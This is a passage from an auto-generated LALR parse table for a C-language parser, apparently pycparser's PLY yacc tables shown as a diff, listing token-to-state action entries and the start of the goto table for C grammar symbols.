31,-34,7,-229,-232,-221,-83,-219,-68,-33,-32,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'XOR':([132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,158,160,161,162,163,164,166,167,168,169,176,191,224,230,232,234,235,236,237,238,261,263,268,273,310,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,400,401,402,403,404,405,407,411,478,480,482,483,487,547,551,565,],[-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-255,-315,-289,251,-328,-316,-329,-320,-276,-323,-312,-336,-274,-326,-280,-277,-334,
-332,-331,-333,-298,-297,-279,-278,-312,-261,251,-262,-260,-264,-268,-263,-259,-266,-271,-257,-256,-265,251,-267,-269,251,-258,-296,-295,-294,-293,-292,-305,-281,-282,-290,-291,-275,-306,-299,-300,]),'AUTO':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,21,22,23,25,26,27,29,30,33,34,36,38,39,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,65,68,71,75,76,80,81,82,86,87,89,90,93,96,97,98,100,101,109,111,118,119,123,124,129,180,181,182,187,191,200,211,223,240,241,278,284,285,286,289,291,298,300,301,302,303,305,308,312,314,316,317,328,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,442,443,448,449,453,454,460,496,497,500,505,506,510,511,512,536,554,555,557,558,575,576,578,579,],[26,26,-113,-128,26,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,26,-120,-115,-65,-102,26,-131,-108,-238,-111,-122,-63,-129,-29,-121,-116,-62,-112,-70,-52,-123,-117,26,26,-119,26,-114,-130,26,-118,-71,-103,26,-131,-96,-98,26,-131,-95,-101,-97,-53,26,26,-88,26,-147,-335,-146,-167,-166,-100,-126,26,-87,-61,-72,26,-73,26,-89,-149,-336,-30,26,-74,-174,-175,26,-76,-79,-82,-75,-77,26,-81,-215,-214,-80,-216,-78,-127,-153,-151,-148,-168,-69,-36,-35,26,26,26,-234,-233,26,-231,-217,-230,-81,-84,-218,-152,-150,-170,-169,-31,-34,26,-229,-232,-221,-83,-219,-68,-33,-32,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'DIVEQUAL':([132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,160,161,163,164,166,167,168,169,176,191,224,230,232,234,235,236,237,238,261,263,268,273,310,402,403,404,405,407,411,478,480,482,483,487,547,551,565,],[-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-315,-289,-328,-316,-329,-320,-276,-323,-312,-336,357,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-312,-296,-295,-294,-293,-292,-305,-281,-282,-290,-291,-275,-306,-299,-300,]),'TIMES':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,22,23,25,26,27,29,30,33,34,35,36,37,38,39,40,43,44,45,46,47,49,50,52,53,54,55,56,58,59,60,61,62,63,64,65,66,67,68,69,71,76,80,81,82,85,87,89,91,94,96,97,98,100,101,103,104,105,106,109,111,116,117,119,120,121,122,123,124,126,128,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,156,158,160,161,162,163,164,165,166,167,168,169,171,173,174,175,176,177,180,181,187,191,192,198,201,202,204,205,206,211,218,219,220,223,224,227,229,230,231,232,233,234,235,236,237,238,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,263,265,266,268,269,273,275,278,279,280,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,310,312,314,316,317,319,328,329,332,336,338,339,342,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,400,401,402,403,404,405,407,411,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,442,443,445,447,448,449,459,472,475,477,478,480,481,482,483,484,487,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,547,549,550,551,553,554,555,557,558,565,566,569,574,575,576,577,578,579,],[35,-337,-113,-128,35,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,-120,-115,-65,-102,-126,-131,-108,-238,-111,-337,-122,35,-63,-129,35,-121,-116,-62,-112,-70,-123,-117,-337,-337,-119,-337,-114,-130,35,-118,-71,-103,-337,-9,-131,-91,-10,-96,35,-98,-131,-95,-101,-97,173,-126,35,35,-93,-147,-335,-146,-167,-166,-28,35,-182,-27,-100,-126,173,-337,-87,-90,-94,-92,-61,-72,35,-337,173,-317,-321,-318,-286,-303,-285,-324,-330,-3
13,-319,-144,-301,-274,-314,173,-142,-327,173,-283,-287,-325,-304,-322,-302,-255,-315,-289,253,-328,-316,-288,-329,-320,-276,-323,173,-284,173,173,-312,35,-73,173,-149,-336,35,-183,173,35,336,-28,-337,35,352,-28,-337,-74,-274,-337,173,-326,173,-280,173,-277,-334,-332,-331,-333,-174,-175,173,173,173,173,173,173,173,173,173,173,173,173,173,173,173,173,173,173,173,-298,-297,173,173,-279,-143,-278,-140,35,-141,-145,420,-76,-79,-82,-75,173,-77,173,173,-81,-215,-214,-80,-216,173,-78,-312,-127,-153,-151,-148,173,-168,173,-69,-284,173,173,35,-284,173,173,-244,-247,-245,-241,-242,-246,-248,173,-250,-251,-243,-249,-12,173,173,-11,253,253,253,253,253,253,253,253,253,253,-257,-256,253,253,253,253,253,-258,-296,-295,-294,-293,-292,-305,173,173,173,494,-234,-233,173,-231,173,173,-217,173,-230,173,-84,-218,173,173,-152,-150,35,173,-170,-169,-337,-337,-198,173,-281,-282,173,-290,-291,173,-275,-337,-284,-229,-232,173,-221,173,-83,-219,-68,541,-28,-337,173,-11,173,173,-220,173,173,173,-284,173,173,-306,173,-337,-299,173,-225,-224,-222,-84,-300,173,173,173,-226,-223,173,-228,-227,]),'LPAREN':([0,1,2,3,4,5,6,7,8,10,11,12,13,14,15,16,17,18,19,20,22,23,25,26,27,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,64,65,66,67,68,69,71,72,73,76,77,80,81,82,85,86,87,89,91,94,96,97,98,100,101,103,104,105,106,109,111,112,116,117,119,120,121,122,123,124,126,127,128,131,132,133,134,135,136,137,138,139,140,141,142,143,145,146,147,148,149,150,151,152,153,154,155,156,160,161,163,164,165,166,167,168,169,170,171,173,174,175,176,177,180,181,187,191,192,198,199,200,201,202,204,205,206,211,216,218,219,220,223,227,229,230,231,233,235,236,237,238,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,263,265,266,269,275,276,278,279,280,282,283,284,285,286,289,290,291,292,296,297,298,299,300,301,302,303,305,307,308,310,311,312,314,316,317,319,328,329,332,336,338,339,340,341,342,344,345,347,352,353,354,355,356,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,402,403,404,405,407,411,412,413,414,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,442,443,445,447,448,449,453,454,457,458,459,464,465,472,475,477,481,482,483,484,488,489,490,492,494,496,497,499,500,502,504,505,506,510,511,512,513,514,515,518,519,521,522,529,530,531,532,533,535,536,537,538,539,541,542,543,544,545,547,549,550,551,553,554,555,557,558,559,560,565,566,569,570,571,574,575,576,577,578,579,],[37,-337,-113,-128,69,-124,-110,-106,85,-104,-107,-125,-105,-64,37,-60,-67,-99,-66,-109,-120,-115,-65,-102,-126,95,-108,-238,-111,-337,-122,37,-63,-129,37,116,-29,-121,-116,-62,-112,-70,118,-123,-117,-337,-337,-119,-337,-114,-130,37,-118,-71,-103,-337,-9,95,-91,-10,-96,69,-98,69,129,-131,-37,-95,-101,-97,174,118,-126,69,37,-93,-147,-335,-146,-167,-166,-28,-180,-182,-27,-100,-126,95,174,-337,-87,-90,-94,-92,-61,-72,69,129,-337,229,-317,-321,-318,-286,-303,-285,-324,-330,-313,-319,-144,-301,-314,231,-142,-327,233,-283,-287,-325,-304,-322,239,-302,-315,-289,-328,-316,-288,-329,-320,266,-323,267,174,-284,229,233,-312,278,-73,229,-149,-336,69,-183,-181,-30,229,69,229,-28,-337,342,-38,229,-28,-337,-74,-337,229,-326,229,229,-334,-332,-331,-333,-174,-175,174,174,174,174,174,174,174,174,174,174,174,174,174,174,174,174,229,174,174,-298,-297,229,229,-143,-140,278,278,-141,-145,-337,422,-76,-79,-82,-75,229,-77,427,430,174,229,434,-81,-215,-214,-80,-216,229,-78,-312,441,-127,-153,-151,-148,174,-168,174,-69,-284,229,229,-36,-35,342,342,460,-45,-284,229,229,-44,-43,-244,-247,-245,-241,-242,-
246,-248,229,-250,-251,-243,-249,-12,174,229,-11,-296,-295,-294,-293,-292,-305,229,174,422,229,229,-234,-233,229,-231,229,229,-217,229,-230,229,-84,-218,229,229,-152,-150,69,174,-170,-169,-31,-34,342,460,-337,-39,-42,-337,-198,174,174,-290,-291,229,-337,-213,-207,-211,-284,-229,-232,229,-221,229,538,-83,-219,-68,-33,-32,229,-28,-337,-41,-40,229,-11,-209,-208,-210,-212,229,229,-220,229,229,229,-284,229,229,-51,-50,-306,229,-337,-299,229,-225,-224,-222,-84,-46,-49,-300,229,229,-48,-47,229,-226,-223,229,-228,-227,]),'MINUSMINUS':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,132,133,134,135,136,137,138,139,140,141,143,145,146,148,149,150,151,152,153,154,156,160,161,163,164,165,166,167,168,169,171,173,174,175,176,181,191,198,201,204,205,206,218,219,220,227,229,230,231,233,235,236,237,238,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,263,265,266,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,310,319,329,332,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,402,403,404,405,407,411,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,459,472,475,477,481,482,483,484,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,547,549,550,551,553,554,555,557,558,565,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,175,-335,-28,-182,-27,175,-337,-87,-72,-337,175,-317,-321,-318,-286,-303,-285,-324,-330,-313,-319,-301,-314,175,-327,175,-283,-287,-325,-304,-322,-302,-315,-289,-328,-316,-288,-329,-320,261,-323,175,-284,175,175,-312,175,-336,-183,175,175,-28,-337,175,-28,-337,-337,175,-326,175,175,-334,-332,-331,-333,175,175,175,175,175,175,175,175,175,175,175,175,175,175,175,175,175,175,175,-298,-297,175,175,-337,-76,-79,-82,-75,175,-77,175,175,-81,-215,-214,-80,-216,175,-78,-312,175,175,-69,-284,175,175,-284,175,175,-244,-247,-245,-241,-242,-246,-248,175,-250,-251,-243,-249,-12,175,175,-11,-296,-295,-294,-293,-292,-305,175,175,175,175,-234,-233,175,-231,175,175,-217,175,-230,175,-84,-218,175,175,175,-337,-337,-198,175,175,-290,-291,175,-337,-284,-229,-232,175,-221,175,-83,-219,-68,175,-28,-337,175,-11,175,175,-220,175,175,175,-284,175,175,-306,175,-337,-299,175,-225,-224,-222,-84,-300,175,175,175,-226,-223,175,-228,-227,]),'ID':([0,1,2,3,4,5,6,7,10,11,12,13,14,15,16,17,18,19,20,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,43,44,45,46,47,49,50,52,53,54,55,56,58,59,60,61,62,63,64,65,66,67,68,69,71,72,76,80,81,82,85,87,89,91,94,96,97,98,100,101,102,103,104,105,106,109,111,116,117,118,119,120,121,122,123,124,126,128,129,131,135,137,142,146,147,149,150,151,165,171,173,174,175,180,181,187,191,192,193,194,198,199,201,202,204,205,206,211,218,219,220,223,227,229,231,233,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,262,264,265,266,269,275,279,280,282,284,285,286,287,289,290,291,297,298,300,301,302,303,305,307,308,312,314,316,317,319,327,328,329,332,336,338,339,342,344,349,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,372,373,375,377,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,442,443,445,447,448,449,457,459,460,472,475,477,481,484,485,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,548,549,550,553,554,555,557,558,566,569,574,575,576,577,578,579,],[42,-337,-113,-128,42,-124,-110,-106,-104,-107,-125,-105,-64,42,-60,-67,-99,-66,-109,-120,-115,-154,-65,-102,-126,-155,-131,-108,98,101,-238,-111,-337,-122,42,-63
,-129,42,-121,-116,-62,-112,-70,-123,-117,-337,-337,-119,-337,-114,-130,42,-118,-71,-103,-337,-9,-131,-91,-10,-96,42,-98,42,-131,-95,-101,-97,176,-126,42,42,-93,-147,-335,-146,-167,-166,197,-28,-180,-182,-27,-100,-126,176,-337,176,-87,-90,-94,-92,-61,-72,42,-337,176,176,-286,-285,-144,176,-142,176,-283,-287,-288,176,-284,176,176,-73,310,-149,-336,42,197,197,-183,-181,176,42,176,-28,-337,42,176,-28,-337,-74,-337,176,176,176,-174,-175,176,176,176,176,176,176,176,176,176,176,176,176,176,176,176,176,176,176,176,403,405,176,176,-143,-140,-141,-145,-337,-76,-79,-82,423,-75,176,-77,176,310,-81,-215,-214,-80,-216,310,-78,-127,-153,-151,-148,176,197,-168,176,-69,-284,176,176,42,42,176,-284,176,176,-244,-247,-245,-241,-242,-246,-248,176,-250,-251,-243,-249,-12,176,176,176,-11,176,176,176,176,-234,-233,176,-231,310,176,-217,176,-230,310,-84,-218,310,176,-152,-150,42,176,-170,-169,42,-337,176,-337,-198,176,176,176,176,-337,-284,-229,-232,176,-221,310,-83,-219,-68,176,-28,-337,176,-11,176,310,-220,310,176,310,-284,176,176,176,176,-337,176,-225,-224,-222,-84,176,310,310,-226,-223,310,-228,-227,]),'IF':([61,97,119,124,181,191,284,285,286,289,291,298,300,301,302,303,305,307,308,332,424,425,428,429,432,435,437,438,439,440,496,497,500,502,505,506,510,535,536,537,539,554,555,557,558,569,574,575,576,577,578,579,],[-71,-335,-87,-72,311,-336,-76,-79,-82,-75,-77,311,-81,-215,-214,-80,-216,311,-78,-69,-234,-233,-231,311,-217,-230,311,-84,-218,311,-229,-232,-221,311,-83,-219,-68,311,-220,311,311,-225,-224,-222,-84,311,311,-226,-223,311,-228,-227,]),'STRING_LITERAL':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,135,136,137,146,149,150,151,152,165,171,173,174,175,181,191,198,201,204,205,206,218,219,220,227,229,230,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,319,329,332,333,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,452,459,472,475,477,481,484,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,549,550,553,554,555,557,558,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,152,-335,-28,-182,-27,152,-337,-87,-72,-337,152,-286,230,-285,152,152,-283,-287,-325,-288,152,-284,152,152,152,-336,-183,152,152,-28,-337,152,-28,-337,-337,152,-326,152,152,152,152,152,152,152,152,152,152,152,152,152,152,152,152,152,152,152,152,152,152,152,-337,-76,-79,-82,-75,152,-77,152,152,-81,-215,-214,-80,-216,152,-78,152,152,-69,152,-284,152,152,-284,152,152,-244,-247,-245,-241,-242,-246,-248,152,-250,-251,-243,-249,-12,152,152,-11,152,152,152,152,-234,-233,152,-231,152,152,-217,152,-230,152,-84,-218,152,152,152,230,-337,-337,-198,152,152,152,-337,-284,-229,-232,152,-221,152,-83,-219,-68,152,-28,-337,152,-11,152,152,-220,152,152,152,-284,152,152,152,-337,152,-225,-224,-222,-84,152,152,152,-226,-223,152,-228,-227,]),'FLOAT':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,21,22,23,25,26,27,29,30,33,34,36,38,39,40,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,64,65,66,67,68,71,75,76,80,81,82,85,86,87,89,90,91,93,94,95,96,97,98,99,100,101,105,109,111,118,119,120,121,122,123,124,129,142,147,172,174,177,180,181,182,184,185,186,187,188,189,190,191,192,198,200,211,214,223,229,231,233,239,240,241,267,269,275,278,279,280,284,285,286,289,291,298,300,301,302,303,305,308,312,313,314,315,316,317,318,328,332,340,341,342,350,422,424,425,427,428,432,435,43
7,438,439,442,443,446,448,449,453,454,460,496,497,500,505,506,510,511,512,536,554,555,557,558,575,576,578,579,],[44,-337,-113,-128,44,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,44,-120,-115,-65,-102,-126,-131,-108,-238,-111,-122,-63,-129,44,-29,-121,-116,-62,-112,-70,-52,-123,-117,-337,-337,-119,-337,-114,-130,44,-118,-71,-103,-337,-9,-131,-91,-10,-96,-98,44,-131,-95,-101,-97,44,-53,-126,44,-88,44,44,-93,44,-147,-335,-146,44,-167,-166,-182,-100,-126,44,-87,-90,-94,-92,-61,-72,44,-144,-142,44,44,44,-73,44,-89,44,44,44,-149,-159,-160,-156,-336,44,-183,-30,44,44,-74,44,44,44,44,-174,-175,44,-143,-140,44,-141,-145,-76,-79,-82,-75,-77,44,-81,-215,-214,-80,-216,-78,-127,44,-153,44,-151,-148,-157,-168,-69,-36,-35,44,44,44,-234,-233,44,-231,-217,-230,-81,-84,-218,-152,-150,-158,-170,-169,-31,-34,44,-229,-232,-221,-83,-219,-68,-33,-32,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'XOREQUAL':([132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,160,161,163,164,166,167,168,169,176,191,224,230,232,234,235,236,237,238,261,263,268,273,310,402,403,404,405,407,411,478,480,482,483,487,547,551,565,],[-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-315,-289,-328,-316,-329,-320,-276,-323,-312,-336,361,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-312,-296,-295,-294,-293,-292,-305,-281,-282,-290,-291,-275,-306,-299,-300,]),'LSHIFTEQUAL':([132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,160,161,163,164,166,167,168,169,176,191,224,230,232,234,235,236,237,238,261,263,268,273,310,402,403,404,405,407,411,478,480,482,483,487,547,551,565,],[-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-315,-289,-328,-316,-329,-320,-276,-323,-312,-336,363,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-312,-296,-295,-294,-293,-292,-305,-281,-282,-290,-291,-275,-306,-299,-300,]),'RBRACKET':([3,39,58,76,103,105,106,117,128,132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,158,160,161,162,163,164,166,167,168,169,176,178,191,198,204,205,218,219,224,225,230,232,234,235,236,237,238,261,263,268,272,273,282,334,335,336,337,351,352,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,400,401,402,403,404,405,406,407,411,419,420,421,455,456,459,466,467,468,471,476,478,480,482,483,486,487,491,493,494,513,514,524,540,541,547,551,561,562,564,565,],[-128,-129,-130,-131,-28,-182,-27,-337,-337,-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-255,-315,-289,-253,-328,-316,-329,-320,-276,-323,-312,-252,-336,-183,-337,-28,-337,-28,-274,-239,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-235,-278,-337,453,-4,454,-3,464,465,-261,-273,-262,-260,-264,-268,-263,-259,-266,-271,-257,-256,-265,-272,-267,-269,-270,-258,-296,-295,-294,-293,482,-292,-305,-337,492,-337,511,512,-337,518,519,-240,520,-237,-281,-282,-290,-291,-236,-275,529,530,531,-337,-28,-254,559,560,-306,-299,570,571,572,-300,]),}
+
+# _lr_action_items maps each token name to a pair of parallel lists
+# (parser states, actions); the loop below expands that compact encoding
+# into the nested lookup table _lr_action[state][token] = action.
+_lr_action = {}
+for _k, _v in _lr_action_items.items():
+   for _x,_y in zip(_v[0],_v[1]):
+      if not _x in _lr_action:  _lr_action[_x] = {}
+      _lr_action[_x][_k] = _y
+del _lr_action_items
+
+_lr_goto_items = 
{'expression_statement':([181,298,307,429,437,440,502,535,537,539,569,574,577,],[284,284,284,284,284,284,284,284,284,284,284,284,284,]),'struct_or_union_specifier':([0,21,40,59,75,85,91,93,95,99,118,129,172,174,181,184,185,186,214,229,231,233,239,267,278,298,313,315,342,350,422,427,460,],[5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,]),'init_declarator_list':([4,89,],[70,70,]),'init_declarator_list_opt':([4,89,],[79,79,]),'iteration_statement':([181,298,307,429,437,440,502,535,537,539,569,574,577,],[285,285,285,285,285,285,285,285,285,285,285,285,285,]),'static_assert':([0,59,181,298,307,429,437,440,502,535,537,539,569,574,577,],[17,17,286,286,286,286,286,286,286,286,286,286,286,286,286,]),'unified_string_literal':([85,116,131,146,149,171,174,175,181,201,204,218,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,290,297,298,307,319,329,333,338,339,353,354,364,373,375,412,413,419,421,427,429,430,434,437,440,441,447,477,481,484,499,502,513,521,533,535,537,538,539,542,543,549,553,566,569,574,577,],[136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,452,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,136,]),'assignment_expression_opt':([204,218,419,421,513,],[334,351,491,493,540,]),'brace_open':([31,32,92,96,98,100,101,130,131,181,201,229,298,307,375,413,429,437,440,477,478,479,502,521,535,537,539,569,574,577,],[99,102,181,184,185,193,194,181,227,181,227,181,181,181,227,488,181,181,181,488,488,488,181,227,181,181,181,181,181,181,]),'enumerator':([102,193,194,327,],[195,195,195,450,]),'typeid_noparen_declarator':([211,],[348,]),'type_qualifier_list_opt':([35,117,128,206,220,282,459,515,],[104,204,218,339,354,419,513,543,]),'declaration_specifiers_no_type_opt':([1,27,52,53,55,63,87,],[66,94,120,121,122,94,94,]),'expression_opt':([181,298,307,427,429,437,440,499,502,533,535,537,539,553,566,569,574,577,],[288,288,288,498,288,288,288,534,288,552,288,288,288,567,573,288,288,288,]),'designation':([227,472,488,550,],[369,369,369,369,]),'parameter_list':([118,129,278,342,422,460,],[213,213,213,213,213,213,]),'alignment_specifier':([0,1,4,21,27,52,53,55,59,63,75,85,87,89,93,95,99,118,129,174,177,181,184,185,186,192,211,229,231,233,239,267,278,298,313,315,342,350,422,427,460,],[53,53,81,53,53,53,53,53,53,53,53,142,53,81,53,142,142,53,53,142,280,53,142,142,142,280,81,142,142,142,142,142,53,53,142,142,53,53,53,53,53,]),'labeled_statement':([181,298,307,429,437,440,502,535,537,539,569,574,577,],[289,289,289,289,289,289,289,289,289,289,289,289,289,]),'abstract_declarator':([177,211,278,342,],[281,281,418,418,]),'translation_unit':([0,],[59,]),'init_declarator':([4,89,126,202,],[84,84,217,331,]),'direct_abstract_declarator':([177,211,276,278,342,344,457,],[283,283,414,283,283,414,414,]),'designator_list':([227,472,488,550,],[376,376,376,376,]),'identifier':([85,116,118,129,131,146,149,171,174,175,181,201,204,218,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,290,297,298,307,319,329,338,339,349,353,354,364,372,373,375,412,413,419,421,427,429,430,434,437,440,441,447,460,477,481,484,485,499,502,513,521,533,535,537,538,539,542,543,548,549,553,566,569,574,577,],[143,143,215,215,143,143,143,143,143,143,143,143,143,143,143,143,143,143,143,143,143,143,143,143,143,143,143,143,143,143,143,1
43,143,143,143,143,143,143,143,143,143,143,143,143,143,143,461,143,143,143,470,143,143,143,143,143,143,143,143,143,143,143,143,143,143,215,143,143,143,527,143,143,143,143,143,143,143,143,143,143,143,563,143,143,143,143,143,143,]),'offsetof_member_designator':([485,],[526,]),'unary_expression':([85,116,131,146,149,171,174,175,181,201,204,218,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,290,297,298,307,319,329,338,339,353,354,364,373,375,412,413,419,421,427,429,430,434,437,440,441,447,477,481,484,499,502,513,521,533,535,537,538,539,542,543,549,553,566,569,574,577,],[144,144,224,232,234,144,224,273,224,224,224,224,224,224,224,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,224,144,144,224,224,224,144,224,224,144,144,224,224,224,224,224,144,224,224,144,224,224,224,224,224,224,224,224,224,144,144,144,224,224,224,224,224,224,224,224,224,224,224,224,224,224,224,224,224,224,]),'abstract_declarator_opt':([177,211,],[274,343,]),'initializer':([131,201,375,521,],[226,330,473,546,]),'direct_id_declarator':([0,4,15,37,40,59,69,72,89,91,126,192,202,211,342,344,445,457,],[48,48,86,48,48,48,48,86,48,48,48,48,48,48,48,86,48,86,]),'struct_declaration_list':([99,184,185,],[186,313,315,]),'pp_directive':([0,59,],[14,14,]),'declaration_list':([21,75,],[93,93,]),'id_init_declarator':([40,91,],[108,108,]),'type_specifier':([0,21,40,59,75,85,91,93,95,99,118,129,172,174,181,184,185,186,214,229,231,233,239,267,278,298,313,315,342,350,422,427,460,],[18,18,109,18,18,147,109,18,147,147,18,18,269,147,18,147,147,147,109,147,147,147,147,147,18,18,147,147,18,18,18,18,18,]),'compound_statement':([92,130,181,229,298,307,429,437,440,502,535,537,539,569,574,577,],[180,223,291,378,291,291,291,291,291,291,291,291,291,291,291,291,]),'pointer':([0,4,37,40,59,69,89,91,104,126,177,192,202,211,278,342,445,],[15,72,15,15,15,72,72,15,199,72,276,72,72,344,276,457,72,]),'typeid_declarator':([4,69,89,126,192,202,445,],[74,125,74,74,74,74,74,]),'id_init_declarator_list':([40,91,],[113,113,]),'declarator':([4,89,126,192,202,445,],[78,78,78,324,78,324,]),'argument_expression_list':([266,],[409,]),'struct_declarator_list_opt':([192,],[322,]),'block_item_list':([181,],[298,]),'parameter_type_list_opt':([278,342,422,],[417,417,495,]),'struct_declarator':([192,445,],[323,508,]),'type_qualifier':([0,1,4,21,27,35,52,53,55,59,63,75,85,87,89,93,95,99,103,117,118,128,129,172,174,177,181,184,185,186,192,205,206,211,219,220,229,231,233,239,267,278,282,298,313,315,342,350,422,427,459,460,514,515,],[52,52,80,52,52,105,52,52,52,52,52,52,105,52,80,52,105,105,198,105,52,105,52,198,105,279,52,105,105,105,279,198,105,80,198,105,105,105,105,105,105,52,105,52,105,105,52,52,52,52,105,52,198,105,]),'assignment_operator':([224,],[364,]),'expression':([174,181,229,231,233,258,265,290,298,307,427,429,430,434,437,440,441,499,502,533,535,537,538,539,549,553,566,569,574,577,],[270,294,270,270,270,399,406,426,294,294,294,294,501,503,294,294,507,294,294,294,294,294,556,294,564,294,294,294,294,294,]),'storage_class_specifier':([0,1,4,21,27,52,53,55,59,63,75,87,89,93,118,129,181,211,278,298,342,350,422,427,460,],[1,1,68,1,1,1,1,1,1,1,1,1,68,1,1,1,1,68,1,1,1,1,1,1,1,]),'unified_wstring_literal':([85,116,131,146,149,171,174,175,181,201,204,218,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,290,297,298,307,319,329,338,339,353,354,364,373,375,412,413,419,421,427,429,430,434,437,440,441,447,477,481,484,499,502,513,521,533,535,537,538,539,542,543,549,553,566,569,57
4,577,],[153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,]),'translation_unit_or_empty':([0,],[9,]),'initializer_list_opt':([227,],[370,]),'brace_close':([99,184,185,186,196,309,313,315,325,326,370,472,528,550,],[187,314,316,317,328,439,442,443,448,449,469,523,551,565,]),'direct_typeid_declarator':([4,69,72,89,126,192,202,445,],[73,73,127,73,73,73,73,73,]),'external_declaration':([0,59,],[16,123,]),'pragmacomp_or_statement':([307,429,440,502,535,537,539,569,574,577,],[436,500,506,536,554,555,557,576,578,579,]),'type_name':([85,95,174,229,231,233,239,267,],[157,183,271,379,380,381,382,410,]),'typedef_name':([0,21,40,59,75,85,91,93,95,99,118,129,172,174,181,184,185,186,214,229,231,233,239,267,278,298,313,315,342,350,422,427,460,],[36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,]),'pppragma_directive':([0,59,99,181,184,185,186,298,307,313,315,429,437,440,502,535,537,539,569,574,577,],[25,25,189,300,189,189,189,300,437,189,189,437,300,437,437,437,437,437,437,437,437,]),'statement':([181,298,307,429,437,440,502,535,537,539,569,574,577,],[301,301,438,438,505,438,438,438,438,558,438,438,438,]),'cast_expression':([85,116,131,171,174,181,201,204,218,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,290,297,298,307,319,329,338,339,353,354,364,373,375,412,413,419,421,427,429,430,434,437,440,441,447,477,481,484,499,502,513,521,533,535,537,538,539,542,543,549,553,566,569,574,577,],[158,158,158,268,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158